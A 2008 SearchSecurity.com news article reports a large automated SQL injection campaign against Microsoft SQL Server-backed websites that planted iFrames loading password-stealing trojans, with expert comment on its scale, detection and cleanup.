SQL injection attack infects hundreds of thousands of websites

By Michael S. Mimoso, Editor, Information Security magazine 30 Apr 2008 | SearchSecurity.com

Security Wire Daily News Digg This!     StumbleUpon     Del.icio.us

Chinese hackers have conducted successful SQL injection attacks on hundreds of thousands of websites during the past 10 days, culling their targets from search engines.

They're blindly tossing SQL injections at sites and getting a high success rate. They're upping the game. Jeremiah Grossman, chief technology officer, White Hat Security

Normally, SQL injection attacks are targeted attacks, one IP address at a time. The closest attack on this scale would be the SAMY worm attack on the MySpace.com domain, but that was against just one domain.

The attackers are using simple search engine queries to find massive lists of ASP or PHP sites, for example, to determine injection parameters and then automating their attacks. They are taking advantage of functionality in Microsoft's SQL Server database server that enables multiple SQL statements to be sent in the same HTTP expression. Other databases such as MySQL or Postgres don't support this functionality.

The attack is a complicated SQL injection, said Jeremiah Grossman, a Web application security expert and chief technology officer of White Hat Security. Grossman said the injection is nearly a paragraph in size, and fully encoded, enabling it to elude intrusion detection systems. Part of it contains Chinese characters and a leet-treatment of the Chinese word for hello, ni hao (n1 ha0).

SQL injection attacks: Preventing blind SQL injection attacks: Most security professionals know what SQL injection attacks are and how to protect their Web applications against them. But, they may not know that their preventative measures may be leaving their applications open to blind SQL injection attacks. Cross-build injection attacks: Keeping an eye on Web applications' open source components: One popular method used to exploit such flaws is to inject code into the running application, a process common in SQL injections and cross-site scripting attacks. Download security expert, Michael Cobb's cross-build injection attack advice to your PC or favorite mobile device. Learn about SQL injection attacks and other Web application attacks in our Learning Guide. Find out how to prevent SQL injections.

The SQL Injection exploit loops through database tables loading in malicious JavaScript everywhere it can, Grossman said, and ultimately infects browsers with malware via a Web page iFrame which loads content such as Trojans, from different hacker sites.

Grossman said he knows of one site loading a Trojan trying to steal World of Warcraft passwords. But, the real danger is that essentially these sites have been backdoored, and the payloads can be swapped out at any time.

"They're blindly tossing SQL injections at sites and getting a high success rate. They're upping the game," Grossman said. "This is a new level of sophistication."

Authorities have asked Chinese ISPs to shut down these sites, but that doesn't hamper the attack methodology; attackers can merely move to new domains.

"It's difficult for site owners to tell if their sites have been exploited," Grossman said. "If they look into their own site, they can tell whether malware is being pulled in. If it isn't, it could be because the hacker-controlled site is down. They'll think they're clean, and tomorrow, they may not be."

Clean up is a chore. Site owners would either have to manually search their database tables, row by row, table by table, looking for the offending code and remove it, or restore the database from a backup version if one is available.

"If you use the 80-20 rule, it could be months before we see this cleaned up," Grossman said. "If the hacker-controlled domains are down at the moment, you might be owned, but not being exploited."

Tags: Application Attacks (Buffer Overflows, Cross-Site Scripting),  Web Application Security,  VIEW ALL TAGS

Digg This!     StumbleUpon     Del.icio.us

RELATED CONTENT Application Attacks (Buffer Overflows, Cross-Site Scripting) Month of Twitter Bugs project to document Twitter flaws Adobe issues first quarterly patch release fixing 13 flaws Balancing security and performance: Protecting layer 7 on the network Adobe issues Reader update fixing zero-day flaw The Pipe Dream of No More Free Bugs Security Squad: Federal cybersecurity defenses Oracle issues 43 updates, fixes serious database flaws Attackers target new Microsoft PowerPoint zero-day flaw How to detect input validation errors and vulnerabilities Vulnerability test methods for application security assessments Application Attacks (Buffer Overflows, Cross-Site Scripting) Research Web Application Security Month of Twitter Bugs project to document Twitter flaws Are Web application penetration tests still important? IT pros can detect, prevent website vulnerabilities, thwart attacks PCI compliance requirement 6: Systems and applications Trust eroding as social engineering attacks climb in 2009, says Kaspersky expert IT managers under pressure to weaken Web security policy US-CERT warns of Gumblar, Martuz drive-by exploits XSS bugs, information leakage top list of website vulnerabilities How to find and stop automated SQL injection attacks More companies seek third-party Web app code review, survey finds

RELATED GLOSSARY TERMS Terms from Whatis.com − the technology online dictionary buffer overflow  (SearchSecurity.com) cache poisoning  (SearchSecurity.com) cyberterrorism  (SearchSecurity.com) dictionary attack  (SearchSecurity.com) directory harvest attack  (SearchSecurity.com) distributed denial-of-service attack  (SearchSecurity.com) JavaScript hijacking  (SearchSecurity.com) ping of death  (SearchSecurity.com) stack smashing  (SearchSecurity.com) SYN flooding  (SearchSecurity.com)

RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary